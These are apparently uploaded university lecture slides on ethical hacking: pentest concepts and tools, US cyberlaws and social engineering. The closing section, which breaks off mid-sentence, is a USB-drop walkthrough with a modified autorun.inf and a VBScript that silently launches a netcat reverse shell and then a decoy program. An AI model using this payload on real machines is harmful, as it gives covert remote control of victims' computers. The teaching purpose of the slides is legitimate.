0% found this document useful (0 votes)
59 views64 pages

Unit I

dseVFSG

Uploaded by

tejaswini reddy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
59 views64 pages

Unit I

dseVFSG

Uploaded by

tejaswini reddy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 64

• What is Vulnerability?

• A vulnerability is a weakness or flaw in a system, software, or hardware that can be exploited by


attackers to gain unauthorized access, disrupt operations, or steal sensitive information.
• What is Vulnerability Assessment?
• A Vulnerability Assessment is the process of defining, identifying, classifying, and prioritizing
security weaknesses and vulnerabilities in systems, including servers, applications, and network
infrastructures.
• What is Penetration Testing?
• Penetration testing (or pen testing) is a security exercise where a cyber-security expert attempts to
find and exploit vulnerabilities in a computer system. The purpose of this simulated attack is to
identify any weak spots in a system’s defenses which attackers could take advantage of.
• This is categorized as black box, white box, and gray box penetration testing.
• Black Box Testing: Testers have no prior knowledge of the system or application being tested.
• White Box Testing: Testers have full knowledge of the system or application, including source code
and network diagrams.
• Gray Box Testing: Testers have partial knowledge of the system or application.
Introduction To The Ethics Of Ethical Hacking
What is Ethical Hacking?
Ethical hacking is the legal and professional practice of testing computer systems, networks, and applications. This
is done to find and fix security weaknesses before malicious hackers can exploit them. It involves using hacking
techniques, but with permission and a positive goal. The aim is to protect digital assets and improve overall
cybersecurity.
Ethics of Ethical Hacking:
1.Authorization: Ethical hackers must have explicit permission from the system or network owner before
conducting any tests.
2. Non-Disruption: Hackers should avoid actions that could disrupt or damage the system or network
3.Confidentiality: Any information discovered during the hacking process must be kept confidential, unless
disclosure is necessary to address a security issue.
4.Legality: All activities must comply with relevant laws and regulations.
5.Disclosure: Vulnerabilities should be reported responsibly to the appropriate parties, allowing them to take
corrective action
6.Purpose of Testing: Ethical hacking is driven by the intention to protect, rather than exploit. Ethical hackers seek
to identify potential vulnerabilities before malicious actors can discover them. The information they uncover is
shared only with authorized parties to help improve the organization's security.
7.Transparency and Accountability: Ethical hackers are expected to operate with transparency, providing clear
documentation of their methods, findings, and the implications of any discovered vulnerabilities. This transparency
is essential to build trust and ensure accountability, as it allows the organization to understand and address security
gaps effectively.

Why you need to understand your enemy's tactics


• Understanding your enemy's tactics is crucial in various fields, including cybersecurity, military strategy, and
competitive business. Here are some reasons why:
1. Anticipate and Prepare
2. Identify Vulnerabilities
3. Develop Effective Countermeasures
4. Improve Situational Awareness
5. Enhance Adaptability
6. Reduce Uncertainty
7. Improve Training and Education.
• In the context of cybersecurity, understanding your enemy's tactics is critical to developing effective threat
intelligence, incident response strategies, and security protocols. By knowing how attackers operate, you can
better protect your systems, networks, and data from cyber threats.
Recognizing the gray areas in security
• Recognizing the gray areas in security is essential for developing a nuanced
understanding of potential risks, ethical dilemmas, and operational challenges. Here are
some key considerations.
• Ethical Boundaries
• What Constitutes Ethical Hacking?:Ethical hacking helps improve security, but it can
become unclear or questionable if the hacker doesn't have clear permission or if the
boundaries of what they can test aren't well defined.
• Data Privacy: Handling sensitive data during ethical hacking, even in testing, can raise
privacy concerns, so ethical hackers must carefully find security flaws without exposing
or misusing private user information.
2. Legal Implications
• Varying Laws: Cybersecurity laws differ by jurisdiction, and actions that are legal in one
area may be illegal in another. Navigating these complexities can create uncertainty about
what actions are permissible
• Responsibility for Breaches: Even if an organization follows all the right steps, it can
still face legal trouble after a security breach—especially if the issue involves outside
companies or unclear responsibility.
3. Scope of Security Measures
• Overreach vs. Underreach: If security is too strict, it can block normal user actions or harm privacy, but if
it's too weak, it can leave systems open to attacks.
• Automated Systems: Using automated tools for security checks can be tricky because they might make
mistakes or miss important issues, and it’s not always clear when to trust the tool or rely on human judgment
4. Insider Threats
• Motivations and Intent: Employees might break security rules either to cause harm or to try helping in the
wrong way, and it can be hard to tell the difference or judge their intentions clearly.
• Balancing Trust and Surveillance: Organizations need to trust their employees, but also watch over their
actions for security—finding the right balance can be hard and may raise privacy concerns.
5. Security vs. Usability
• User Experience: Finding the right balance between strong security and user convenience is tricky—if
security rules are too strict, users might try to bypass them, which can make the system less safe.
• Access Controls: Implementing strict access controls may enhance security but can hinder productivity.
Finding the right balance often requires navigating gray areas.
Emerging Threats and Technologies
• Adapting to Change: New technologies (like AI and IoT) introduce unknown risks and ethical considerations.
Organizations must continuously assess the implications of these innovations on security practices.
• Deepfakes and Misinformation: The rise of deepfakes and misinformation campaigns creates challenges in
distinguishing legitimate communications from malicious ones, complicating security assessments
Vulnerability Assessment
Definition: A vulnerability assessment is a systematic process of identifying, quantifying, and
prioritizing vulnerabilities in a system, network, or application.
• Key Characteristics:
• Focus: Primarily identifies known vulnerabilities and weaknesses within a system without
exploiting them.
• Methodology: Utilizes automated tools to scan for vulnerabilities, often combined with manual
reviews.
• Output: Generates a report detailing identified vulnerabilities, their severity, and
recommendations for remediation. The output is usually focused on risk management and
prioritization.
• Frequency: Typically performed regularly (e.g., quarterly or annually) as part of an
organization’s ongoing security strategy.
• Goals:
• Identify weaknesses before they can be exploited by attackers.
• Provide organizations with a clear picture of their security posture.
• Help prioritize remediation efforts based on the severity of vulnerabilities.
• Penetration Testing
• Definition: Penetration testing (or pen testing) simulates real-world attacks on a system to identify
vulnerabilities and assess the effectiveness of security controls.
• Key Characteristics:
• Focus: Goes beyond identification to actually exploit vulnerabilities, mimicking the tactics of a
malicious actor.
• Methodology: Involves both automated tools and manual techniques to test the security of systems.
Testers attempt to gain unauthorized access, escalate privileges, and extract sensitive data.
• Output: Results in a detailed report that includes a description of vulnerabilities exploited, the data
accessed, and recommendations for improving security. It often includes an assessment of the
impact and potential consequences of a breach.
• Frequency: Generally performed less frequently than vulnerability assessments, often on an annual
basis or after significant changes to the environment.
• Goals:
• Test the effectiveness of security measures and incident response capabilities.
• Provide insights into the potential impact of a real-world attack.
• Help organizations understand their vulnerabilities in a practical context.
Comparison:
Penetration Testing and Tools
• Penetration testing (or pen testing) is a simulated cyber attack conducted to identify and exploit
vulnerabilities in a system, network, or application. A variety of tools are available to assist
penetration testers in carrying out these assessments effectively. Here’s an overview of some
commonly used penetration testing tools, along with their primary functions:
Categories of Penetration Testing Tools
1. Information Gathering
• Nmap: A powerful network scanning tool used to discover hosts and services on a network,
providing insights into open ports and running services.
• Recon-ng: A web reconnaissance framework that allows testers to gather information from
various public sources and APIs.
2. Vulnerability Scanning
• OpenVAS: An open-source vulnerability scanner that identifies vulnerabilities in systems and
applications by running a variety of checks.
• Nessus: A widely used commercial vulnerability scanner that detects vulnerabilities,
misconfigurations, and compliance issues.
3. Exploitation Tools
• Metasploit: A comprehensive penetration testing framework that allows testers to develop, test,
and execute exploits against various systems. It provides a vast library of exploits and payloads.
• SQLMap: An automated tool for detecting and exploiting SQL injection vulnerabilities in web
applications.
4. Web Application Testing
• Burp Suite: A powerful platform for web application security testing that includes tools for
intercepting traffic, scanning for vulnerabilities, and performing manual testing.
• OWASP ZAP (Zed Attack Proxy): An open-source web application security scanner designed to
find security vulnerabilities in web applications.
5. Password Cracking
• John the Ripper: A popular password cracking tool that supports various hashing algorithms and
is used to identify weak passwords.
• Hashcat: A high-performance password recovery tool that uses GPU acceleration to crack
passwords efficiently.
6. Wireless Network Testing
• Aircrack-ng: A suite of tools used for assessing the security of Wi-Fi networks,
including cracking WEP and WPA/WPA2 encryption keys.
• Kismet: A wireless network detector and sniffer that can capture packets and analyze
wireless traffic
7. Social Engineering
• Social-Engineer Toolkit (SET): A framework designed to perform advanced social
engineering attacks, allowing testers to simulate phishing and other social engineering
tactics.
8. Post-Exploitation
• Empire: A post-exploitation framework that allows testers to manage compromised
hosts, execute commands, and gather information about the environment.
• Cobalt Strike: A commercial penetration testing tool that provides capabilities for post-
exploitation, including command and control features
Choosing the Right Tools
When selecting tools for penetration testing, consider the following factors:
• Scope of the Test: Different tools are suited for specific types of assessments (e.g., web
applications, networks, or social engineering).
• Experience Level: Some tools are user-friendly for beginners, while others require
advanced knowledge.
• Environment: Ensure that the tools are compatible with the systems and technologies in
use.
• Regulatory Compliance: Be aware of legal and regulatory considerations when using
• certain tools, especially in sensitive environments.
Ethical Hacking Process:
• Organizations employ ethical hackers to simulate a real cyberattack on their systems and
networks. This attack comes in different phases. It takes a lot of skill and effort for
ethical hackers to identify all the vulnerabilities and exploit them to their full benefit.
This simulated attack is used to pinpoint all areas of weaknesses that the organization
faces to work towards strengthening them. The phases of ethical hacking are:
1. Reconnaissance
This is the first step of Hacking. It is also called as Footprinting and information gathering
Phase. This is the preparatory phase where we collect as much information as possible about
the target. We usually collect information about three groups,
1.Network
2.Host
3.People involved
There are two types of Foot printing:
•Active: Directly interacting with the target to gather information about the target. Eg Using
Nmap tool to scan the target
•Passive: Trying to collect the information about the target without directly accessing the
target. This involves collecting information from social media, public websites etc.
2. Scanning:

• Three types of scanning are involved:


• Port scanning: This phase involves scanning the target for the
information like open ports, Live systems, various services running on
the host.
• Vulnerability Scanning: Checking the target for weaknesses or
vulnerabilities which can be exploited. Usually done with help of
automated tools
• Network Mapping: Finding the topology of network, routers,
firewalls servers if any, and host information and drawing a network
diagram with the available information. This map may serve as a
valuable piece of information throughout the hacking process.
3. Gaining Access

• This phase is where an attacker breaks into the system/network using various tools
or methods.
• After entering into a system, he has to increase his privilege to administrator level
so he can install an application he needs or modify data or hide data.
4. Maintaining Access:
• Hacker may just hack the system to show it was vulnerable or he can be so
mischievous that he wants to maintain or persist the connection in the background
without the knowledge of the user.
• This can be done using Trojans, Rootkits or other malicious files. The aim is to
maintain the access to the target until he finishes the tasks he planned to
accomplish in that target.
5. Clearing Track:

• No thief wants to get caught. An intelligent hacker always clears all


evidence so that in the later point of time, no one will find any traces
leading to him.
• To achieve this, the hacker focuses on modifying/corrupting/deleting
the values of Logs, altering registry values, uninstalling all
applications used, and deleting all folders created.
• In the event of a compromised site, it becomes crucial to promptly
address and fix the hacked site to minimize potential damage and
prevent further unauthorized access.
6. Reporting

• A thorough report is necessary for an ethical hacker's work to be considered complete.


This document acts as the organization's road plan for resolving concerns that have been
identified. A well-organized report ought to contain:
• Executive Summary: Outlining the main weaknesses and the overall security posture.
• Technical Findings: Detailed descriptions of vulnerabilities, the identification process,
and possible consequences.
• Step-by-Step Exploitation: An explanation of the methods used to exploit vulnerabilities
during testing.
• Recommendations: Providing practical remediation alternatives, such as policy revisions
and technical improvements.
Identify Unethical Hacker
• Unethical hackers—often called black hat hackers—are identified through a mix of digital
forensics, behavioral analysis, and cybersecurity tools. Here's how investigators and ethical
hackers track them down:
• Intrusion Detection Systems (IDS)
• These systems monitor network traffic for suspicious activity.
• Alerts are triggered by anomalies like unauthorized access, data exfiltration, or unusual
login times.
• Behavioral Profiling
• Language and grammar: Comments in code or ransom notes can hint at the hacker’s
native language.
• Coding style: Just like handwriting, coding habits can be distinctive.
• Social engineering patterns: Repeated phishing tactics or scam formats can help
identify the attacker.
Digital Footprint Analysis
• IP Tracing: Detecting the Real Source
• Even if hackers use proxies or VPNs, investigators can sometimes trace their real IP addresses
through:
• Misconfiguration or Errors: Hackers might occasionally connect without activating the VPN
or proxy correctly. In such cases, their real IP address gets logged.
• VPN/Proxy Logs: If investigators work with VPN or proxy service providers (especially in
countries with data-sharing agreements), they can request connection logs that might reveal the
original IP.
• Pattern Recognition:
• If multiple attacks come through the same VPN service or IP range, analysts may correlate
them to a single source.
• Time patterns (e.g., same attack times every day) can be tied to a particular time zone or
location.
• Chain Tracing:
• Hackers often use multiple proxies. Skilled investigators can trace through these layers,
analyzing logs at each step if cooperation from network providers is possible.
Raise of Cyber Law
• Today’s CEOs and managers must go beyond just making profits—they also need to
understand cybersecurity risks and follow strict privacy laws.
• They can be held personally responsible for security failures, so they must work
closely with both IT and legal experts.
• As technology evolves, new laws (called cyberlaws) are being created to address new
types of online threats.
• These laws affect how companies do business, protect data, and handle employee and
customer interactions.
• It's crucial for both business and legal professionals to stay updated on these laws to
avoid legal trouble and protect their organizations.
Understanding Individual Cyberlaws
• Many countries, especially those with advanced technology use, are working to create
laws to fight computer crimes.
• Here we focus on a few important U.S. federal computer crime laws as examples, but it
does not cover all details or all laws.
• The goal is to help information security professionals understand that legal knowledge is
important in their field.
• While this chapter talks about U.S. laws, other countries also have rules in place to handle
cybercrime. It's important for professionals to learn the laws that apply in their own
country and area of work.
18 USC Section 1029: The Access Device Statute
• The Access Device Statute (Section 1029) is a U.S. law that aims to stop
crimes like stealing credit card numbers, passwords, and other access tools
used to get money, services, or goods illegally.
• It makes it a crime to create, use, or sell fake or stolen access devices or
tools used to steal this information, even if a computer isn’t involved.
• Common crimes include credit card fraud, ATM skimming, and setting up
fake websites to steal user data. Offenders can face high fines and long
prison sentences.
• This law shows that fighting cybercrime needs both strong technology and
strong legal action.
18 USC Section 1030 of the Computer Fraud and Abuse Act
• The Computer Fraud and Abuse Act (CFAA) is a U.S. law that protects computers and
networks from unauthorized access and cybercrimes like hacking, spreading harmful code, or
stealing data.
• It covers not only government and financial systems but also any computer used for business
or communication, including those overseas.
• Even accessing a system with permission but going beyond allowed limits (like an employee
misusing access) can be punished under CFAA.
• Offenders face serious fines and prison time, depending on the crime.
• The FBI and Secret Service handle these cases to protect national infrastructure and online
commerce.
Worms and Viruses and the CFAA
• The spread of viruses and worms is growing due to the rapid expansion of the
internet and many users having weak system security.
• Under the Computer Fraud and Abuse Act (CFAA), it is illegal to send
malicious software that damages computers without permission. People who
create or spread malware, like viruses or launch DDoS attacks, can be fined
and sent to prison.
• For example, one hacker tried to destroy data on Fannie Mae’s servers, and
another attacked the Church of Scientology’s websites—both were charged
under this law. The maximum penalty for such crimes can be up to 10 years in
prison and a $250,000 fine.
Blaster Worm Attacks and the CFAA
• Virus and worm attacks like the Blaster worm have caused major damage, leading
the U.S. government to take strong legal action under the Computer Fraud and
Abuse Act (CFAA).

• In one case, a person in Minnesota was caught and punished for releasing a version
of Blaster that infected 7,000 computers and attempted to attack Microsoft.

• These infected computers were turned into bots without their owners knowing.

• Officials like the Attorney General and FBI have stressed how serious these crimes
are, calling them dangerous and costly. Despite efforts, many hackers are never
caught, so improving software security from the start is a better long-term solution.
Disgruntled Employees

• Companies often escort fired employees out quickly and cut off their computer access right
away—not because all employees are bad, but to protect the company from potential harm.

• Some former workers, especially those in IT, have used their insider knowledge to damage
systems or steal data out of revenge.

• Cases under the Computer Fraud and Abuse Act (CFAA) show how ex-employees have
hacked into systems, deleted important data, or stolen money.

• Since it’s hard to calculate financial losses or win court cases, businesses take strict security
steps when someone leaves. Having clear termination procedures helps companies stay safe
from such insider threats.
Other Areas for the CFAA
• The Lori Drew case showed that using fake accounts or breaking website rules may not
always count as a crime under the Computer Fraud and Abuse Act (CFAA), especially if
it’s just a terms-of-service violation.

• Drew created a fake MySpace profile that led to cyberbullying and a teenager's suicide,
but the judge ruled it wasn’t computer fraud.

• On the other hand, in the first major VoIP(Voice over Internet Protocol) hacking case,
Edwin Pena illegally rerouted over 500,000 internet phone calls and sold them for profit,
causing $1.4 million in losses.

• He was caught after a long search and pleaded guilty. These cases show how courts are still
figuring out how the CFAA applies to new technology and online behavior.
State Law Alternatives
• The Computer Fraud and Abuse Act (CFAA) allows both criminal and civil cases if
someone illegally damages a computer system, but victims must prove at least $5,000 in
damages in many cases.

• However, some cyber harms—like bandwidth misuse or system overloads—are hard to


measure, so CFAA may not always help.

• In such situations, state laws like trespass or theft laws may offer another way to take
legal action, though these laws vary from state to state.

• For example, eBay used state trespass laws to stop automated data scraping that wasn’t
clearly damaging under CFAA. To strengthen a case, companies should track costs and
employee time spent fixing the damage, as these help prove harm in court.
18 USC Sections 2510, et. Seq., and 2701, et. Seq., of the
Electronic Communication Privacy Act
• The Electronic Communication Privacy Act (ECPA) protects communications
from being accessed without permission and is made up of two parts:
• the Wiretap Act, which protects messages while they’re being transmitted, and
• the Stored Communications Act, which protects stored messages.
• A key legal debate is around what counts as an “interception”—usually, courts
say it only applies while data is actively moving, not while it’s stored.
• The ECPA allows some authorized access, like by the government, if proper
legal steps are followed.
• An example of controversy under this law is the Google Buzz case, where users
sued Google for accessing Gmail contacts without permission to create public
follower lists. This shows how businesses must clearly define what access is
authorized to avoid breaking privacy laws
Interesting Application of ECPA
• Websites use small text files called cookies to track users' browsing and shopping habits,
allowing them to personalize what they show you based on your past activity.
• Sometimes, this data is shared between websites, leading to targeted ads and
recommendations.
• Some users felt this violated privacy laws like the Stored Communications Act and the
Wiretap Law, arguing that cookies accessed their personal data or intercepted
communications.
• However, under the ECPA, if one party (like a website) consents to the data collection,
it’s legal.
• Since websites gave permission to share data, the cookie tracking was allowed and
continues to be widely used today.
Trigger Effects of Internet Crime
• The Internet has revolutionized access to information, benefiting individuals,
businesses, and governments, but it has also created opportunities for malicious
actors to exploit this openness.

• After the 9/11 attacks, government agencies, citing national security concerns, began
limiting public access to sensitive data that was once readily available online.

• This shift sparked criticism, with many arguing that such secrecy often extends
beyond legitimate security needs and affects public transparency.

• Laws like the USA Patriot Act expanded surveillance powers and reduced restrictions
on electronic monitoring, reflecting the growing tension between information
freedom and national security.
Digital Millennium Copyright Act (DMCA)
1. Purpose of the DMCA
• Passed in 1998 to enforce the WIPO Copyright Treaty, the DMCA aims to protect copyrighted works from unauthorized access or use by making it illegal to
bypass technological protection mechanisms (like encryption or DRM).
• It applies even if the underlying work is not used—simply breaking the access control itself is a violation.
2. Anti-Circumvention Provisions
• It is illegal to create, use, or distribute tools or services designed to circumvent access controls on copyrighted content (e.g., encrypted e-books, software,
DVDs).
• Example: Even if you don’t copy or share the content, simply bypassing a password or encryption without permission can lead to prosecution.
3. Impact on Ethical Hacking and Research
• The DMCA has limited exemptions for encryption research and security testing, but these are narrow and don’t cover many common ethical hacking
activities.
• This creates a legal gray area for professionals performing penetration testing, reverse engineering, or teaching hacking skills—even for defensive purposes.

• 4. Real-World Cases
• Few criminal cases have been prosecuted under DMCA, but notable ones include:

• U.S. vs. Kwak – Paid hackers to break satellite TV encryption.

• U.S. vs. Sklyarov – Created software to bypass e-book copy protection.

• U.S. vs. Rocci – Sold mod chips that let game consoles run pirated games.

• 5. Controversy and Push for Reform


• Critics argue that the DMCA limits legitimate research and innovation, especially in cybersecurity.

• There have been efforts to reform or soften the DMCA, but some legislation like the Intellectual Property Protection Act and PRO-IP Act of
2008 further strengthened enforcement rather than weakening it.
4. Real-World Cases
• Few criminal cases have been prosecuted under DMCA, but notable ones
include:
• U.S. vs. Kwak – Paid hackers to break satellite TV encryption.
• U.S. vs. Sklyarov – Created software to bypass e-book copy protection.
• U.S. vs. Rocci – Sold mod chips that let game consoles run pirated games.
5. Controversy and Push for Reform
• Critics argue that the DMCA limits legitimate research and innovation,
especially in cybersecurity.
• There have been efforts to reform or soften the DMCA, but some legislation
like the Intellectual Property Protection Act and PRO-IP Act of 2008 further
strengthened enforcement rather than weakening it.
Cyber Security Enhancement Act of 2002
1 . Stricter Penalties for Dangerous Cybercrimes
• The CSEA allows life imprisonment for cybercrimes that result in or could potentially cause bodily harm, death, or
threats to public safety.
• For example, hacking into systems controlling hospitals, emergency services, traffic lights, or aircraft could lead to
catastrophic outcomes—and severe legal consequences.
2. Support for National Security and the Patriot Act
• The CSEA was introduced to strengthen the Patriot Act, giving the government more power to monitor and respond
to cybersecurity threats.
• It enhances information sharing between private service providers and law enforcement.
3. Legal Protection for Service Providers
• Internet service providers and tech companies can now report suspicious user activity to law enforcement without
notifying the customer or facing lawsuits.
• This removes legal risk for companies cooperating with investigations.
4. Privacy and Civil Liberties Concerns
• Reports made by providers are exempt from the Freedom of Information Act (FOIA), so users cannot request details
about what data was shared or who reported them.
• Civil rights advocates argue this undermines user privacy and accountability, raising concerns about abuse and
overreach.
Securely Protect Yourself Against Cyber Trespass Act (SPY Act)
1. Purpose and Provisions
• The SPY Act aimed to combat spyware by making it illegal to perform activities
such as installing software without consent, modifying internet settings, collecting
personal data through keystroke logging, misleading users about software
functions, or disabling antivirus tools.
2. Transparency Requirement
• The bill required companies to inform users whenever their personal information
was being collected, promoting user awareness and privacy.
3. Criticism and Opposition
• Critics argued the bill lacked enforcement power, didn’t provide new resources to
law enforcement, and would weaken stricter state laws. It also risked preventing
private entities from aiding the federal government in cybersecurity efforts.
• 4. Concerns About Corporate Loopholes
• There was fear that the law could legally allow hardware and software companies
to monitor users, using spyware-like methods, under the protection of the act.
Social Engineering Attacks
• Social engineering is the psychological manipulation of people in the hopes of
gaining access to confidential information or systems. It is a form of confidence trick
for the purpose of information gathering, fraud, or system access.
• The attacks used in social engineering can be used to steal employees' confidential
information or data, and the most common type of social engineering happens over
either phone or email.
• Other examples of social engineering attacks include criminals posing as service
workers or technicians, so they go unnoticed when access the physical site of a
business.
How a Social Engineering Attack Works
• Social engineering attacks, like phishing, trick victims into revealing sensitive
information by mimicking trusted sources through convincing emails and websites.
• As users become more aware, attackers make these schemes more sophisticated and
company-specific, often targeting employees with fake internal login pages. These
attacks remain common because they are simple to execute and frequently successful.
• Social engineering attacks exploit human emotions—such as fear, curiosity, urgency,
or trust—to trick users into bypassing security protocols, often by presenting
scenarios that seem legitimate or demand immediate action.
• Commonly exploited simple emotions, and an example of how each is exploited,
include:
• Greed: is exploited by offering a valuable reward
• Lust: by enticing with provocative content
• Empathy: by impersonating someone in need of help
• Curiosity by presenting irresistible information
• Vanity by appealing to personal ego with flattery or photos.
• Social engineering attacks often begin by triggering simple emotions like curiosity or
vanity to trick users into actions that seem harmless—like clicking a link or logging in—
but actually lead to malware installation or data theft.
• More advanced attackers exploit complex emotions or professional trust to manipulate
people in specific roles, such as convincing a secretary to share internal documents or a
tech support agent to reset credentials, making the attack more subtle and dangerous.
• Attacks of this nature generally attempt to exploit more complex aspects of human
behavior, such as
• A desire to be helpful:“If you’re not busy, would you please copy this file from this CD to
this USB flash drive for me?” Most of us are taught from an early age to be friendly and
helpful. We take this attitude with us to the workplace.
• Authority/conflict avoidance:“If you don’t let me use the conference room to e-mail this
report to Mr. Smith, it’ll cost the company a lot of money and you your job.” If the social
engineer looks authoritative and unapproachable, the target usually takes the easy way out
by doing what’s asked of them and avoiding a conflict.
• Social proof : “Hey look, my company has a Facebook group and a lot of people I know
have joined.” If others are doing it, people feel more comfortable doing something they
wouldn’t normally do alone.
• Regardless of the emotion used, the goal of the attacker is always to trick the victim into taking
an action—like clicking a link or running a program—without realizing the risk or the attacker’s
true intent. Since victims are often inside the target company’s network, getting them to
unknowingly allow remote access can quickly give attackers direct entry to sensitive company
data.
• Conducting a Social Engineering Attack:
• Social engineering attacks (SEAs) must be clearly discussed with the client before being
included in a penetration test, as they involve manipulating employees and can cause emotional
distress if not handled properly.
• These attacks often begin with reconnaissance—gathering information from public sources like
Google, LinkedIn, and social media to identify targets and internal structures.
• Attackers build trust through pretexts (fake scenarios), such as pretending to be a consultant, and
gradually escalate access by exploiting this trust.
• Tactics may include spoofing caller ID, resetting passwords, or gaining access to internal
directories. These exercises often require a team with strong interpersonal, communication, and
hacking skills.
• As attacks become more advanced, the use of fake websites, email accounts, and even face-to-
face impersonations may be necessary to appear legitimate and successfully breach the
organization.
Common Attacks Used in Penetration Testing
• It emphasizes that these attacks aren't guaranteed to work in every situation, since every
target environment is different. Success often depends on specific conditions being in place
—something that might not work one day could be effective the next, and vice versa.
• The previous section gave hypothetical examples meant to help the reader start thinking
like a social engineer and to provide ideas for where to begin.
• Now, the text will present real examples of social engineering tactics that have worked
multiple times in the field.
• These examples focus specifically on the social engineering component of broader
penetration tests.
The Good Samaritan
• The goal of this attack is to gain remote access to a computer on the company network.
• This attack combines SEA techniques with traditional hacking tools. The basic premise is that a
specially prepared USB drive is presented to the target company’s front desk or most publicly
accessible reception area. A very honest-looking person in appropriate attire—a business suit if it’s an
office, for example—hands the employee at the front desk the USB drive, claiming to have found it on
the ground outside.
• The USB drive should look used, have the company name on it, and be labeled with, for example,
“HR Benefits” and the current year.
• What you write on the label of the key is up to you. You’re trying to bait an employee to plug it into a
computer, something they may know they shouldn’t do, so the reward must seem greater than the risk
of violating policy.
• When the USB drive is plugged in, it attempts to install and run a remote access Trojan and pass a
command prompt out to your team across the public Internet. Obviously, what you have the key run is
completely up to you. In this example, we’ll focus on a very simple remote command prompt.
• Putting this attack together is fairly academic in so far as the main work is in the preparation of the
USB drive. The delivery is trivial and can be attempted multiple times and at multiple target locations.
For this attack to work, the target environment must allow the use of USB drives and must have
autorun enabled
• Preparing the USB drive to autorun your payload is a fairly straightforward process as well.
For this example, you’ll need
• A USB drive; in this example, we’ll use an inexpensive SanDisk Cruzer Micro drive.
• A tool to edit an ISO image file; in this example, we’ll use ISO Commander.
• A tool from the manufacturer to write the new ISO image to the drive; in this example,
we’ll use the SanDisk U3 Launchpad, LPInstaller.exe.
• A remote access Trojan; in this example, we’ll simply use a Windows version of netcat.
• In this example, we’re going to use a 1GB SanDisk Cruzer Micro with U3 model.
• Start by downloading the Launchpad Installer application, LPInstaller.exe, from the SanDisk
website.
• You’ll find it under the Support section by using the Find Answers search box.
• This application will download the default U3 ISO image from the SanDisk website and
install it on the flash drive.
• We’re going to trick it into installing an ISO image we’ve modified so that when the USB
drive is plugged into the target machine, it runs code we specify in addition to the U3
Launchpad application.
• Once you have the LPInstaller.exe application downloaded, execute it.
• If you have a personal firewall that operates with a white list, you may have to allow the
application access to the Internet.
• You must be connected to the Internet in order for the application to download the default
ISO image from SanDisk.
• After the application runs, it will require you to plug in a compatible device before it will
allow you to continue. Once it recognizes a compatible device, you can click Next until you
get to the final screen before it writes the image to the flash drive. It should look like this:
• The moment the LPInstaller.exe application detected a compatible flash drive, it began
downloading the default U3 ISO image from the SanDisk website.
• This image is temporarily stored on the user PC in the Application Data section of the
current user’s Documents and Setting directory in a folder called U3. The U3 folder has a
temp folder that contains a unique session folder containing the downloaded ISO file, as
shown here:
•Wait for the ISO file (about 7MB) to fully download through the LPInstaller tool before
making any changes.
•Open the downloaded ISO file (e.g., Pelican-BFG-autorun.iso) using ISO Commander, a
simple ISO editing tool.
•Locate and extract the autorun.inf file from the ISO, then save it to a different location so
you can edit it later with custom commands.
• Extracting the default autorun.inf file is simple Vtype=2
and contains only a few directives. [CopyFiles]
• In this example, we will replace the executable
call with a script of our own. Our script will FileNumber=1
perform an attack using netcat to push a File1=LaunchPad.zip
command shell to a remote computer ,and then
execute the originally specified program, [Update]
LaunchU3.exe, so that the user won’t notice any
abnormal behavior when they plug the USB URL=http://u3.sandisk.com/download/
drive in. The unedited autorun.inf file is as lp_installer.asp?
follows: custom=1.6.1.2&brand=PelicanBFG
[AutoRun] [Comment]
open=wscript LaunchU3.exe -a brand=PelicanBFG
icon=LaunchU3.exe,0 • For our purposes, we’ll only edit the
action=Run U3 Launchpad second line of this file and change it
from
[Definitions]
open=wscript LaunchU3.exe -a
Launchpad=LaunchPad.exe to
open=wscript cruzer/go.vbs
• When the autorun.inf file is executed on insertion of the device, our go.vbs script will
run instead of the LaunchU3.exe application.
• We’ll put it in a directory called cruzer along with the netcat binary nc.exe in an
attempt to make it slightly less noticeable at a casual glance.
• Next we need to create our go.vbs script. Since we’re just demonstrating the technique,
we’ll keep it very simple, as shown next.
• The script will copy the netcat binary to the Windows temp directory and then execute
the netcat command with options to bind a cmd.exe command shell and pass it to a
remote computer
This prevents the script from throwing errors in the event it has trouble
• On Error Resume Next
• set objShell = WScript.CreateObject("WScript.Shell")
• 'Get the location of the temp directory
• temp=objShell.ExpandEnvironmentStrings("%temp%")
• 'Get the location of the Windows Directory
• windir=objShell.ExpandEnvironmentStrings("%windir%")
• set filesys=CreateObject("Scripting.FileSystemObject")
• 'Copy our netcat into the temp directory of the target
• filesys.CopyFile "cruzer\nc.exe", temp & "\"
• 'Wait to make sure the operation completes
• WScript.Sleep 5000
• 'Throw a command prompt to the waiting remote computer, a local test in this case.
• 'The 0 at the end of the line specifies that the command box NOT be displayed to
• 'the user.
• objShell.Run temp & "\nc.exe -e " & windir & "\system32\cmd.exe 192.168.1.106
• 443",0
• 'Execute the application originally specified in the autorun.inf file
• To copy nc.exe (Netcat) to the temp directory, run it to connect back to
an attacker's system via reverse shell, and then launch a decoy
program to avoid user suspicion
• Line-by-line Analysis
• On Error Resume Next
Suppresses all runtime errors. If something fails, the script won't crash or
alert the user.
set objShell = WScript.CreateObject("WScript.Shell")
Creates a shell object, allowing the script to run commands like
cmd.exe.
temp=objShell.ExpandEnvironmentStrings("%temp%")
windir=objShell.ExpandEnvironmentStrings("%windir%")
Gets system environment variables:
%temp%: Path to the Temp folder, e.g., C:\Users\User\AppData\Local\
Temp
%windir%: Windows directory, e.g., C:\Windows
filesys=CreateObject("Scripting.FileSystemObject")
• filesys.CopyFile "cruzer\nc.exe", temp & "\“

• Copies nc.exe from the USB drive (assumed to be mounted under cruzer\)
to the Temp folder
• nc.exe is Netcat
• a networking utility often used for remote control.
• WScript.Sleep 5000
• Waits for 5 seconds (5000 ms) to ensure the file copy completes.
• objShell.Run temp & "\nc.exe -e " & windir & "\system32\cmd.exe
192.168.1.106 443",0
• Launches Netcat, executing cmd.exe and connecting to IP 192.168.1.106
on port 443.
• This is a reverse shell: the victim connects outbound, and the attacker gets
remote terminal access.
• The trailing 0 hides the terminal window from the victim.
• objShell.Run "LaunchU3.exe -a“
• Launches a decoy application (LaunchU3.exe) to make the user think
something legitimate is happening.LaunchU3.exe is associated with U3
smart USB drives, often auto-launched when the drive is plugged in.
• This process outlines how to embed a malicious VBScript (go.vbs) and Netcat (nc.exe)
into a USB drive's ISO image using ISO Commander.
• The script is designed to run silently using VBScript for greater control, leveraging
environment variables to locate system directories like cmd.exe and %temp%.
• After modifying the autorun.inf file and placing all components in the correct directories,
